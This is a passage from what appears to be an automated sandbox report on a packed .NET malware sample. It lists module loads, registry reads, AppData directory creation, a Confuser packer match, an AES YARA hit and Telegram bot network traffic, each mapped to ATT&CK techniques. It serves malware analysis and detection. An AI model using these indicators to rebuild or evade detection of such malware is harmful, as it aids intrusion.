\"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-quirks-l1-1-0.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoree.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter mscoree.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\combase.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter psapi.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\ole32.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-xstate-l2-1-0.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System\\2c3c912ea8f058f9d04c4650128feb3f\\System.ni.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\shell32.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\f7568d7f1b9d356f64779b4c0927cfb3\\System.Drawing.ni.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\c9a4cbc00f690a9e3cddfc400f6e85bb\\System.Windows.Forms.ni.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\31fae3290fad30c31c98651462d22724\\System.Core.ni.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\96f7edb07b12303f0ec2595c7f3778c7\\System.Configuration.ni.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\15af16d373cf0528cb74fc73d365fdbf\\System.Xml.ni.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\nlssorting.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter ntdll.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\bcrypt.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter bcrypt.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\psapi.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\rasapi32.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter rasapi32.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\ws2_32.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter ws2_32.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter RASMAN.DLL (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter rtutils.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-winsvc-L1-1-0.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L1-1-0.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\winhttp.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter winhttp.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter RPCRT4.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter IPHLPAPI.DLL (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter NSI.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter CFGMGR32.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L2-1-0.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\en-US\\tzres.dll.mui (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter user32.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\iphlpapi.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter iphlpapi.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\secur32.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter secur32.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\en-US\\mscorrc.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\en\\mscorrc.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscorrc.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\VERSION.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\diasymreader.dll (UID: 00000000-00003656)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" failed to load missing module \"api-ms-win-appmodel-runtime-l1-1-2.dll\" - [base:0; Status:c0000135]\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" failed to load missing module \"api-ms-win-appmodel-runtime-l1-1-0.dll\" - [base:0; Status:c0000135]\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" failed to load missing module \"api-ms-win-core-quirks-l1-1-0.dll\" - [base:0; Status:c0000135]\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoree.dll\" - [base:0; Status:c0000135]\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" failed to load missing module \"%WINDIR%\\system32\\combase.dll\" - [base:0; Status:c0000135]\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\ole32.dll\" - [base:0; Status:c0000135]\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\shell32.dll\" - [base:0; Status:c0000135]\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\bcrypt.dll\" - [base:0; Status:c0000135]\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\psapi.dll\" - [base:0; Status:c0000135]\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\rasapi32.dll\" - [base:0; Status:c0000135]\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\ws2_32.dll\" - [base:0; Status:c0000135]\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\winhttp.dll\" - [base:0; Status:c0000135]\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\iphlpapi.dll\" - [base:0; Status:c0000135]\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\secur32.dll\" - [base:0; Status:c0000135]\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\VERSION.dll\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 774A0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-7", "type": 10, "name": "Loads the CLR Loader DLL", "description": "\"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" at 68F90000\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" at 69740000", "origin": "Loaded Module", "attck_id": "T1620", "attck_id_wiki": "https://attack.mitre.org/techniques/T1620"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"CreateDirectoryW\" with parameter C:\\Users\\%OSUSER% (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"CreateDirectoryW\" with parameter %USERPROFILE%\\AppData\\Roaming (UID: 00000000-00003656)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:80\"\n \"<IPv4>:443\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-0", "type": 7, "relevance": 1, "name": "Contacts domains", "description": "\"t.me\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-2", "type": 7, "relevance": 5, "name": "GETs files from a webserver", "description": "\"GET /cinoshibot HTTP/1.1\nHost: t.me\nConnection: Keep-Alive\" Response ==> HTTP/1.1 301 Moved Permanently\nServer: nginx/1.18.0\nDate: Thu\n 06 Feb 2025 09:08:20 GMT\nContent-Type: text/html\nContent-Length: 169\nConnection: keep-alive\nLocation: https://t.me/cinoshibot with response body ==>3C68746D6C3E0D0A3C686561643E3C7469746C653E333031204D6F766564205065726D616E656E746C793C2F7469746C653E3C2F686561643E0D0A3C626F6479.......", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-51", "type": 7, "relevance": 1, "name": "Queries DNS server", "description": "\"t.me\"", "origin": "Network Traffic", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9\" was detected as \"Confuser\" and name: \"Protector\"\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9\" was detected as \".NET\" and name: \"Library\"\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Pattern Matching", "identifier": "yara-103", "type": 13, "relevance": 5, "name": "YARA signature match - AES encryption", "description": "YARA signature for AES encryption matched on process \"00000000-00003656\"\n YARA signature for AES encryption matched on file \"sample.bin\"", "origin": "YARA Signature", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll\"\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll\"\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll\"\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-appmodel-runtime-l1-1-2.dll\"\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-appmodel-runtime-l1-1-0.dll\"\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\VCRUNTIME140_CLR0400.dll\"\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ucrtbase_clr0400.dll\"\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-quirks-l1-1-0.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" reads file \"c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config\"\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll.aux\"\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\0b2f69b43a576b9edcc807a30872bd91\\system.ni.dll.aux\"\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\2c3c912ea8f058f9d04c4650128feb3f\\system.ni.dll.aux\"\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.windows.forms\\c9a4cbc00f690a9e3cddfc400f6e85bb\\system.windows.forms.ni.dll.aux\"\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.drawing\\f7568d7f1b9d356f64779b4c0927cfb3\\system.drawing.ni.dll.aux\"\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.configuration\\96f7edb07b12303f0ec2595c7f3778c7\\system.configuration.ni.dll.aux\"\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\31fae3290fad30c31c98651462d22724\\system.core.ni.dll.aux\"\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.xml\\15af16d373cf0528cb74fc73d365fdbf\\system.xml.ni.dll.aux\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "string-310", "type": 2, "relevance": 1, "name": "Contains ability to load modules (API string)", "description": "Found reference to API \"LoadLibrary\" (Indicator: \"LoadLibrary\"; File: \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9\")\n Found reference to API \"LoadLibrary\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00003656.00000001.343303.00CA2000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"\"; Value: \"\")\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\TIME ZONES\\ROMANCE STANDARD TIME\\DYNAMIC DST\"; Key: \"\"; Value: \"\")\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Access type: \"OPEN\"; Path: 